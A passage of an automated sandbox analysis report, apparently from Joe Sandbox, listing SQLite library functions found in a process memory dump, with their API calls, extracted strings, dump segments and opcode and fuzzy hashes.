                                                                          • Opcode ID: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
                                                                          • Instruction ID: 9ac78cbffd0e0cf27e5d0fdbf17c3a3d034f00011a14f89e76d08e502163788c
                                                                          • Opcode Fuzzy Hash: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
                                                                          • Instruction Fuzzy Hash: 8751F1B49467099FDB01DF69D59178EBBF6FF68318F104429E884AB300D379D894CB91
                                                                          Function 6094078D Relevance: 15.0, APIs: 10, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_finalize.SQLITE3 ref: 609407B4
                                                                            • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940672
                                                                            • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940696
                                                                          • sqlite3_finalize.SQLITE3 ref: 609407C2
                                                                            • Part of subcall function 6094064B: sqlite3_mutex_enter.SQLITE3 ref: 609406A7
                                                                          • sqlite3_finalize.SQLITE3 ref: 609407D0
                                                                          • sqlite3_finalize.SQLITE3 ref: 609407DE
                                                                          • sqlite3_finalize.SQLITE3 ref: 609407EC
                                                                          • sqlite3_finalize.SQLITE3 ref: 609407FA
                                                                          • sqlite3_finalize.SQLITE3 ref: 60940808
                                                                          • sqlite3_finalize.SQLITE3 ref: 60940816
                                                                          • sqlite3_finalize.SQLITE3 ref: 60940824
                                                                          • sqlite3_free.SQLITE3 ref: 6094082C
                                                                            • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_finalize$sqlite3_logsqlite3_mutex_enter$sqlite3_free
                                                                          • String ID:
                                                                          • API String ID: 14011187-0
                                                                          • Opcode ID: d36625bd4fa8924ea0abcbec615d2e266582c2e39b3be902bd1f9101c01d6c45
                                                                          • Instruction ID: 14c977e837db455c9c1ce3b69ce7d4e0fb0da6313972e550a4586d0eb1b189ee
                                                                          • Opcode Fuzzy Hash: d36625bd4fa8924ea0abcbec615d2e266582c2e39b3be902bd1f9101c01d6c45
                                                                          • Instruction Fuzzy Hash: F7116774504B008BCB50BF78C9C965877E9AFB5308F061978EC8A8F306EB34D4918B15
                                                                          Function 6091C159 Relevance: 14.0, Strings: 11, Instructions: 290COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $ AND $%s USING %sINDEX %s%s$%s USING AUTOMATIC %sINDEX%.0s%s$)><$0$ANY($COVERING $SCAN$SEARCH$rowid
                                                                          • API String ID: 0-780898
                                                                          • Opcode ID: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                          • Instruction ID: 1b008e11d07f16b9462ef115b46fd1892196ed4c5360d6a6f9a636b6bab85f9b
                                                                          • Opcode Fuzzy Hash: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                          • Instruction Fuzzy Hash: 46D109B0A087099FD714CF99C19079DBBF2BFA8308F10886AE495AB355D774D982CF81
                                                                          Function 609061F1 Relevance: 13.9, Strings: 11, Instructions: 114COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: aolf$aolf$bolb$bolc$buod$buod$laer$laer$rahc$tni$txet
                                                                          • API String ID: 0-2604012851
                                                                          • Opcode ID: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                          • Instruction ID: a78f5df49eecf700eafad7d6eadd6707640e608d2d263d021760269e78388884
                                                                          • Opcode Fuzzy Hash: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                          • Instruction Fuzzy Hash: 2D31B171A891458ADB21891C85503EE7FBB9BE3344F28902EC8B2DB246C735CCD0C3A2
                                                                          Function 60939559 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 426COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: memcmp$sqlite3_logsqlite3_mutex_try
                                                                          • String ID: 0$SQLite format 3
                                                                          • API String ID: 3174206576-3388949527
                                                                          • Opcode ID: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
                                                                          • Instruction ID: d3cc03899c2fb96d27ccc41cf7ad58ff30b38a29db2c3208110d6cb2c70dce50
                                                                          • Opcode Fuzzy Hash: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
                                                                          • Instruction Fuzzy Hash: A3028BB0A082659BDB09CF68D48178ABBF7FFA5308F148269E8459B345DB74DC85CF81
                                                                          Function 6095F004 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_value_text.SQLITE3 ref: 6095F030
                                                                          • sqlite3_value_text.SQLITE3 ref: 6095F03E
                                                                          • sqlite3_stricmp.SQLITE3 ref: 6095F0B3
                                                                          • sqlite3_free.SQLITE3 ref: 6095F180
                                                                            • Part of subcall function 6092E279: strcmp.MSVCRT ref: 6092E2AE
                                                                            • Part of subcall function 6092E279: sqlite3_free.SQLITE3 ref: 6092E3A8
                                                                          • sqlite3_free.SQLITE3 ref: 6095F1BD
                                                                            • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                          • sqlite3_result_error_code.SQLITE3 ref: 6095F34E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_free$sqlite3_value_text$sqlite3_mutex_entersqlite3_result_error_codesqlite3_stricmpstrcmp
                                                                          • String ID: |
                                                                          • API String ID: 1576672187-2343686810
                                                                          • Opcode ID: bd5e6f80f73383bab87bf36e59bc4c906ea1158fee4d4fada053c93264453b50
                                                                          • Instruction ID: c4017fd8acd983bc841f22cdb0f4132ffe50c361176833da1127552c957ad2bb
                                                                          • Opcode Fuzzy Hash: bd5e6f80f73383bab87bf36e59bc4c906ea1158fee4d4fada053c93264453b50
                                                                          • Instruction Fuzzy Hash: B2B189B4A08308CBDB01CF69C491B9EBBF2BF68358F148968E854AB355D734EC55CB81
                                                                          Function 60953679 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 219COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_file_control.SQLITE3 ref: 609537BD
                                                                          • sqlite3_free.SQLITE3 ref: 60953842
                                                                          • sqlite3_free.SQLITE3 ref: 6095387C
                                                                            • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                          • sqlite3_stricmp.SQLITE3 ref: 609538D4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_free$sqlite3_file_controlsqlite3_mutex_entersqlite3_stricmp
                                                                          • String ID: 6$timeout
                                                                          • API String ID: 2671017102-3660802998
                                                                          • Opcode ID: 8cffcba2199636318c40f61931f0f453c1b4c4e8a0677f5b7de6569c291e0b77
                                                                          • Instruction ID: da3e9078838fdf1f068eeacc94130b5fe058058c2a53432068b0843c8cdd1fdd
                                                                          • Opcode Fuzzy Hash: 8cffcba2199636318c40f61931f0f453c1b4c4e8a0677f5b7de6569c291e0b77
                                                                          • Instruction Fuzzy Hash: 6CA11270A083198BDB15CF6AC88079EBBF6BFA9304F10846DE8589B354D774D885CF41
                                                                          Function 6095D3BB Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 187COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_snprintf.SQLITE3 ref: 6095D450
                                                                            • Part of subcall function 60917354: sqlite3_vsnprintf.SQLITE3 ref: 60917375
                                                                          • sqlite3_snprintf.SQLITE3 ref: 6095D4A1
                                                                          • sqlite3_snprintf.SQLITE3 ref: 6095D525
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_snprintf$sqlite3_vsnprintf
                                                                          • String ID: $)><$sqlite_master$sqlite_temp_master
                                                                          • API String ID: 652164897-1572359634
                                                                          • Opcode ID: 8bad6b48079287e07d66e35ebf7d727d8c0cc4a3de3635d3393f65d8d520b325
                                                                          • Instruction ID: a98725bc65f6cff0ffebef66634980575a39ba2d787d432de3c608a01e11e389
                                                                          • Opcode Fuzzy Hash: 8bad6b48079287e07d66e35ebf7d727d8c0cc4a3de3635d3393f65d8d520b325
                                                                          • Instruction Fuzzy Hash: 5991F275E05219CFCB15CF98C48169DBBF2BFA9308F14845AE859AB314DB34ED46CB81
                                                                          Function 6091B05A Relevance: 12.3, APIs: 8, Instructions: 349COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_value_text.SQLITE3 ref: 6091B06E
                                                                          • sqlite3_result_error_toobig.SQLITE3 ref: 6091B178
                                                                          • sqlite3_result_error_nomem.SQLITE3 ref: 6091B197
                                                                          • sqlite3_result_text.SQLITE3 ref: 6091B5A3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                          • String ID:
                                                                          • API String ID: 2352520524-0
                                                                          • Opcode ID: 91a3e282f54c964bbb8224fbc5594699699e4a7ba29507b0b3f6ff953b241f0e
                                                                          • Instruction ID: 99f21b63ad5c9672efebb0dd762c853f70c7e366ddc85f9db9da2d733c13ec0c
                                                                          • Opcode Fuzzy Hash: 91a3e282f54c964bbb8224fbc5594699699e4a7ba29507b0b3f6ff953b241f0e
                                                                          • Instruction Fuzzy Hash: F9E16B71E4C2199BDB208F18C89039EBBF7AB65314F1584DAE8A857351D738DCC19F82
                                                                          Function 6096A481 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                            • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                            • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                          • sqlite3_exec.SQLITE3 ref: 6096A4D7
                                                                            • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                          • sqlite3_result_text.SQLITE3 ref: 6096A5D3
                                                                            • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                            • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                            • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                          • sqlite3_exec.SQLITE3 ref: 6096A523
                                                                          • sqlite3_exec.SQLITE3 ref: 6096A554
                                                                          • sqlite3_exec.SQLITE3 ref: 6096A57F
                                                                          • sqlite3_result_error_code.SQLITE3 ref: 6096A5E1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_exec$sqlite3_bind_intsqlite3_freesqlite3_logsqlite3_mprintfsqlite3_resetsqlite3_result_error_codesqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                          • String ID: optimize
                                                                          • API String ID: 3659050757-3797040228
                                                                          • Opcode ID: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                          • Instruction ID: 653702cfcd2f061f0588c77de086fc27204f9fc351fc8b4992cba684a546c14d
                                                                          • Opcode Fuzzy Hash: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                          • Instruction Fuzzy Hash: E831C3B11187119FE310DF24C49570FBBE6ABA1368F10C91DF9968B350E7B9D8459F82
                                                                          Function 6096544A Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_column_blob.SQLITE3 ref: 609654FB
                                                                          • sqlite3_column_bytes.SQLITE3 ref: 60965510
                                                                          • sqlite3_reset.SQLITE3 ref: 60965556
                                                                          • sqlite3_reset.SQLITE3 ref: 609655B8
                                                                            • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                            • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                          • sqlite3_malloc.SQLITE3 ref: 60965655
                                                                          • sqlite3_free.SQLITE3 ref: 60965714
                                                                          • sqlite3_free.SQLITE3 ref: 6096574B
                                                                            • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                          • sqlite3_free.SQLITE3 ref: 609657AA
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_reset$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mutex_leave
                                                                          • String ID:
                                                                          • API String ID: 2722129401-0
                                                                          • Opcode ID: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                          • Instruction ID: e3a8cc565ee031670952cbbbf81914cbe75110044a29491daaf6513bdc913a85
                                                                          • Opcode Fuzzy Hash: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                          • Instruction Fuzzy Hash: BBD1D270E14219CFEB14CFA9C48469DBBF2BF68304F20856AD899AB346D774E845CF81
                                                                          Function 609644FC Relevance: 12.2, APIs: 8, Instructions: 204COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_malloc.SQLITE3 ref: 609645D9
                                                                            • Part of subcall function 60928099: sqlite3_malloc.SQLITE3 ref: 609280ED
                                                                          • sqlite3_free.SQLITE3 ref: 609647C5
                                                                            • Part of subcall function 60963D35: memcmp.MSVCRT ref: 60963E74
                                                                          • sqlite3_free.SQLITE3 ref: 6096476B
                                                                            • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                          • sqlite3_free.SQLITE3 ref: 6096477B
                                                                          • sqlite3_free.SQLITE3 ref: 60964783
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_free$sqlite3_malloc$memcmpsqlite3_mutex_enter
                                                                          • String ID:
                                                                          • API String ID: 571598680-0
                                                                          • Opcode ID: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                          • Instruction ID: 53ad94a03898eae12f4127695087571842428d6fdffc19c65fee49adcf86f1ae
                                                                          • Opcode Fuzzy Hash: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                          • Instruction Fuzzy Hash: 5E91F674E14228CFEB14CFA9D890B9EBBB6BB99304F1085AAD849A7344D734DD81CF51
                                                                          Function 609634F0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                            • Part of subcall function 60962F28: sqlite3_log.SQLITE3 ref: 60962F5D
                                                                          • sqlite3_mprintf.SQLITE3 ref: 60963534
                                                                          • sqlite3_blob_open.SQLITE3 ref: 6096358B
                                                                          • sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                          • sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                          • sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                          • sqlite3_free.SQLITE3 ref: 60963621
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_blob_bytessqlite3_blob_opensqlite3_blob_readsqlite3_blob_reopensqlite3_freesqlite3_logsqlite3_mallocsqlite3_mprintf
                                                                          • String ID:
                                                                          • API String ID: 4276469440-0
                                                                          • Opcode ID: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                          • Instruction ID: 177081cd506585250240414a33056f89eeda992db91a315aff795e5fc91eaf1e
                                                                          • Opcode Fuzzy Hash: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                          • Instruction Fuzzy Hash: C641E5B09087059FDB40DF29C48179EBBE6AF98354F01C87AE898DB354E734D841DB92
                                                                          Function 6091A226 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_value_text.SQLITE3 ref: 6091A240
                                                                          • sqlite3_value_text.SQLITE3 ref: 6091A24E
                                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A25A
                                                                          • sqlite3_value_text.SQLITE3 ref: 6091A27C
                                                                          Strings
                                                                          • ESCAPE expression must be a single character, xrefs: 6091A293
                                                                          • LIKE or GLOB pattern too complex, xrefs: 6091A267
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_value_text$sqlite3_value_bytes
                                                                          • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                          • API String ID: 4080917175-264706735
                                                                          • Opcode ID: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                          • Instruction ID: 7e7232241edcba55bc41816b79a09feadaac9d75cc2fb544db44a2248cbef301
                                                                          • Opcode Fuzzy Hash: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                          • Instruction Fuzzy Hash: A4214C74A182198BCB00DF79C88165EBBF6FF64354B108AA9E864DB344E734DCC6CB95
                                                                          Function 609250BB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 6092506E: sqlite3_log.SQLITE3 ref: 609250AB
                                                                          • sqlite3_mutex_enter.SQLITE3 ref: 609250E7
